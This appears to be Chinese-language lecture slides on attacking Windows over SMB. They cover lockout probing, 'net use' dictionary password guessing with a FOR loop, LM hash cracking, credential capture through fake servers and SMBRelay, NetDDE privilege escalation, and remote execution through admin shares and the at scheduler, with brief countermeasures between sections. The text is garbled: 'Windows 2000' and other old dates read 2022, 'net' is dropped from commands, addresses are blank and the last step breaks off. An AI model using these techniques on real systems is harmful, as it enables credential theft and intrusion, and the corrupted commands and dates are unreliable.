【正文】 獲取的信息 ， 見到過在這個(gè)字段中以明文的形式寫出的密碼 。 那些不愿意記住復(fù)雜密碼的 “ 不幸的 ” 用戶經(jīng)常在注釋字段中有很多提示 ， 其有助于密碼猜測 ? Administrators組或 Domain Admins組的成員 這些賬戶通常是攻擊者的目標(biāo) ， 因?yàn)樗鼈儞碛斜镜叵到y(tǒng)或域的至高無上的權(quán)限 。 同時(shí) ， 使用 Microsoft的默認(rèn)工具不能鎖定本地的Administrator賬戶 ， 這使得它成為連續(xù)密碼猜測攻擊的目標(biāo) 回顧掃描結(jié)果 ? 共享的組賬戶 大多數(shù)組織都傾向于在給定環(huán)境中的大部分系統(tǒng)上重用賬戶憑據(jù) 。例如類似于 backup(備份 )或 admin(管理 )這樣的賬戶名稱 。 這些賬戶的密碼通常都比較容易猜測 ? 最近一定時(shí)期內(nèi)沒有修改過密碼的賬戶 這通常表明用戶和系統(tǒng)管理員對賬戶維護(hù)工作的不重視 ， 有可能導(dǎo)致潛在的危險(xiǎn) 。 這些賬戶也可能會(huì)使用在創(chuàng)建該賬戶時(shí)指定的默認(rèn)密碼 ， 這是很容易猜出的 (通常會(huì)使用單位的名稱 ， 或者是Wele(歡迎 )等單詞 ） ? 最近一定時(shí)期內(nèi)沒有登錄過的賬戶 同樣 ， 使用頻率很低的賬戶也是維護(hù)工作的疏忽所導(dǎo)致的 ， 它們的密碼通常也比較容易猜出 避免賬戶鎖定－探測鎖定 閾 值 ? Enum – p ? Guest帳戶猜測 在 Windows 2022上 ， Guest賬戶在默認(rèn)情況下是被禁用的 ，但是如果你達(dá)到了鎖定閾值 ， 你仍然能夠收到提示 Guest猜測 ? C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1326 has occurred. Logon failure: unknown user name or bad password. ? C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1909 has occurred. The referenced account is currently locked out and may not be logged on to. Guest猜測 ? 在猜測 Guest(或其他賬戶 )的密碼時(shí) ， 需要注意的另外一件事是如果你確實(shí)猜對了一個(gè)已經(jīng)被禁用賬戶的密碼 ， 那么將會(huì)出現(xiàn)另一種不同的錯(cuò)誤消息： C:\ use \\\ipc$ * /u:guest Type the password for \\mgmgrand\ipc$: System error 1331 has occurred. Logon failure: account currently disabled. ? 在 Windows 2022中 ， Guest賬戶的密碼默認(rèn)為空 。 于是 ， 如果你連續(xù)地以空密碼來猜測 Guest賬戶 ， 那么永遠(yuǎn)也不會(huì)達(dá)到鎖定閾值 (除非密碼被人為修改過 ) 開始攻擊 ?猜測 SMB密碼 手工 SMB密碼猜測 C:\ use \\\ipc$ password /u:\username System error 1326 has occurred. Logon failure: unknown user name or bad password. 可能的用戶名密碼組合 (做字典，直接使用 Xsa測試） 使用 For循環(huán)字典攻擊 ?創(chuàng)建字典 C:\echo administrator administrator password administrator administrator 使用 For循環(huán)字典攻擊 ?猜測 C:\FOR /F tokens=1,2* %i in ()^ More? do use \\\IPC$ %j /u:\%i^ More? 2nul^ More? amp。amp。 echo %time% %date% ^ More? amp。amp。 echo \\ acct: %i pass: %j 使用 For循環(huán)字典攻擊 ?查看猜測結(jié)果 C:\type 11:53: Wed 05/09/2022 \\ acct: administrator pass: 自動(dòng)攻擊工具 ?NAT ?SMBGrind ?Fgrind 對策 ? 實(shí)施密碼復(fù)雜性要求 ? 賬戶鎖定 ? 啟用登錄失敗事件的審核 ? 查看事件日志 ? 鎖定真正的 Administrator賬戶并創(chuàng)建一個(gè)假目標(biāo) ? 禁用閑置賬戶 ? 仔細(xì)核查管理人員 開始攻擊 ?竊聽 SMB認(rèn)證 竊聽方法 ?直接從網(wǎng)絡(luò)電纜上嗅探 SMB憑據(jù) ?使用欺騙性服務(wù)器捕獲 SMB憑據(jù) ?中間人 (Maninthemiddle， MITM)攻擊 LAN Manager的口令散列 ?微軟在 Windows NT 和 2022系統(tǒng)里缺省安裝了LAN Manager口令散列 ?由于 LAN Manager使用的加密機(jī)制比微軟現(xiàn)在的方法脆弱 ， LAN Manager的口令能在很短的時(shí)間內(nèi)被破解 。 即使是強(qiáng)健的口令散列也能在一個(gè)月內(nèi)破解掉 LAN Manager的口令散列機(jī)制 ?長的口令被截成 14個(gè)字符 ? 短的口令被填補(bǔ)空格變成 14個(gè)字符 ?口令中所有的字符被轉(zhuǎn)換成大寫 ?口令被分割成兩個(gè) 7個(gè)字符的片斷 LAN Manager的口令散列機(jī)制 ? LM算法是從賬戶密碼的兩個(gè)獨(dú)立的 7個(gè)字符分段創(chuàng)建用戶的散列的 ? 前 8個(gè)字節(jié)來自于用戶密碼的前 7個(gè)字符 ， 隨后的 8個(gè)字節(jié)來自于密碼的第 8~14個(gè)字符 LAN Manager的口令散列機(jī)制 ? 每塊都可以通過對所有可能的 8字節(jié)組合進(jìn)行窮舉攻擊而猜出 ? 攻擊全部的 8字節(jié) “ 字符空間 ” 對于現(xiàn)代的桌面計(jì)算機(jī)處理器來說是很輕松的事情 ? 如果攻擊者能夠發(fā)現(xiàn)用戶的 LM散列 ， 那么他們最終破解得到實(shí)際的明文密碼就很可能了 LC4phtcrack L0phtcrack的局限性 ? 只能從共享介質(zhì)中捕獲質(zhì)詢 應(yīng)答通信 ? 目前還不能從兩個(gè) Windows 2022系統(tǒng)間的登錄交換中獲取散列 ? 通過網(wǎng)絡(luò)監(jiān)聽破解質(zhì)詢 應(yīng)答散列所需的時(shí)間隨著添加的密碼散列數(shù)量而線性增長 ? 在使用 SMBCapture之前 ， WinPcap 程序必須成功安裝和運(yùn)行 ? 目前還不能從 NTLMv2質(zhì)詢 應(yīng)答通信中得到散列 欺騙－ 將 SMB登錄重定向到攻擊者 ? 假設(shè)攻擊者能夠欺騙用戶連接到他所指定的 SMB服務(wù)器上去 ， 捕獲 LM應(yīng)答就變得容易多 ? L0phtcrack的早期版本中曾經(jīng)建議了一種最基本的欺騙方法：向目標(biāo)用戶發(fā)送一封電子郵件 ， 其中嵌入假冒的 SMB服務(wù)器的超級(jí)鏈接 。 用戶收到這封郵件 ， 單擊超級(jí)鏈接 (手動(dòng)的或自動(dòng)的 )， 客戶端會(huì)在不受注意的情況下將該用戶的SMB憑據(jù)通過網(wǎng)絡(luò)發(fā)送 ? 這樣的超級(jí)鏈接很容易偽裝 ， 而且通常只需要與用戶進(jìn)行很少的交互 ， 因?yàn)槿绻麤]有明確提供其他認(rèn)證信息的話 ,Windows會(huì)自動(dòng)嘗試以當(dāng)前用戶的身份登錄 對策 ? 確保遵守網(wǎng)絡(luò)安全的最佳操作準(zhǔn)則 。 在受到保護(hù)的網(wǎng)絡(luò)中使用 SMB服務(wù) ， 確保全部的網(wǎng)絡(luò)基礎(chǔ)設(shè)施不允許SMB通信到達(dá)不受信任的結(jié)點(diǎn)上 ? 配置網(wǎng)絡(luò)中所有的 Windows系統(tǒng) ， 禁止 LM散列在網(wǎng)絡(luò)中的傳播 禁止發(fā)送 LM散列 使用 SMBRelay捕獲 SMB認(rèn)證 ? SMBRelay實(shí)際上是一個(gè) SMB服務(wù)器 ， 它能夠從到來的SMB通信中收集用戶名和密碼散列 ? 顧名思義 ， SMBRelay不僅能夠?qū)崿F(xiàn)虛假的 SMB終端的功能 —— 在特定的情況下 ， 它還能夠進(jìn)行中間人 (maninthemiddle， MITM)攻擊 建立假的 SMB服務(wù)器 C:\smbrelay /E SMBRelay ?TCP (NetBT) level SMB maninthemiddle relay attack Copyright 2022: Sir Dystic, Cult of the Dead Cow Send plaints, ideas and donations to [2] ETHERNET CSMACD ?3Com 10/100 Mini PCI Ether Adapter [1] SOFTWARE LOOPBACK ?MS TCP Loopback interface 啟動(dòng)假的 SMB服務(wù)器 C:\smbrelay /IL 2 /IR 2 ；在序號(hào)為 2的網(wǎng)絡(luò)接口上建立 SMBRelay ?TCP (NetBT) level SMB maninthemiddle relay attack Copyright 2022: Sir Dystic, Cult of the Dead Cow Send plaints, ideas and donations to Using relay adapter index 2: 3Com EtherLink PCI 等待并捕獲 SMB連接 Connection from :1526 …… Request type: Session Message 137 bytes …… Username: administrator Domain: CAESARSTS OS: Windows 2022 2195 Lanman type: Windows 2022 Password hash written to disk 權(quán)限提升 ?NetDDE 權(quán)限提升 ? 權(quán)限提升通常是指提升當(dāng)前用戶賬戶的能力 ， 達(dá)到具有更 高 權(quán) 限 的 賬 戶 ， 通 常 是 超 級(jí) 用 戶 ， 例如Administrator或 SYSTEM的過程 ? 從惡意黑客的角度來說 ， 獲取一個(gè)普通賬戶 ， 然后進(jìn)行權(quán)限提升攻擊 ， 比遠(yuǎn)程進(jìn)行攻擊直接獲取超級(jí)用戶權(quán)限要容易得多 ? 不管在哪種情況下 ， 無論他達(dá)到了什么特權(quán)級(jí)別 ， 通過認(rèn)證的攻擊者都比未通過認(rèn)證時(shí)要有很多達(dá)到目的的選擇 作為 SYSTEM身份運(yùn)行的 NetDDE ? 2022年 2月 ， @stake的 Dildog發(fā)現(xiàn)了 Windows 2022的網(wǎng)絡(luò)動(dòng)態(tài)數(shù)據(jù)交換服務(wù) (Network Dynamic Data Exchange Service， NetDDE)中的一個(gè)漏洞 ， 這個(gè)漏洞允許本地用戶以 SYSTEM特權(quán)運(yùn)行任意的命令 ? NetDDE是使應(yīng)用程序通過 “ 受信任的共享 ” 來共享數(shù)據(jù)的一種技術(shù) 。 通過受信任的共享 ， 可以發(fā)出請求執(zhí)行應(yīng)用程序 ， 并運(yùn)行在 SYSTEM賬戶的上下文中 獲得交互 ?命令行控制 ?GUI控制 交互方式 ? 一旦攻擊者獲取了對 Windows 2022系統(tǒng)的管理訪問 ， 幾乎沒有什么方法能夠阻止他 將帶來的損害 。 很少有攻擊者會(huì)滿足于他所獲得的 “ 管理 ” 成就并滿意地離開 。 相反 ， 他總會(huì)進(jìn)一步企圖獲取交互式的控制 ? 交互控制是查看系統(tǒng)的內(nèi)部工作狀態(tài)并任意執(zhí)行命令的能力 ， 就像物理上坐在系統(tǒng)前面一樣 。 在 Windows世界中 ， 這可以通過兩種方式之一來實(shí)現(xiàn)：通過命令行界面 ， 例如類似于 tel的連接 ， 或者通過圖形化的界面 ， 例如 PCAnywhere、 Microsoft終端服務(wù)器或其他類似的遠(yuǎn)程控制產(chǎn)品 ? 當(dāng)然 ， 攻擊者不會(huì)希望使用這種重量級(jí)的技術(shù) ， 他們需要的是小的 、易于隱藏的控制方法 命令行控制 ? ? ?Net use (直接使用 ) ? Windows NT/2022 Resource Kit ?式 ?要使用 Windows系統(tǒng)的命令行控制 ， 你必須進(jìn)行如下步驟的操作： 1. 與目標(biāo)之間創(chuàng)建管理連接： C:\ use \\\ipc$ password /u:administrator 2. 將一個(gè)驅(qū)動(dòng)器映射到管理共享 C$： C:\ use * \\\c$ Drive D: is now connected to \\\c$. The mand pleted successfully. 3. 將 ： C:\copy d:\winnt\system32 4. 調(diào)用 sc命令啟動(dòng)計(jì)劃任務(wù)服務(wù)： C:\sc \\ start schedule 5. 確定遠(yuǎn)程系統(tǒng)上的時(shí)間： C:\ time \\ at命令啟動(dòng)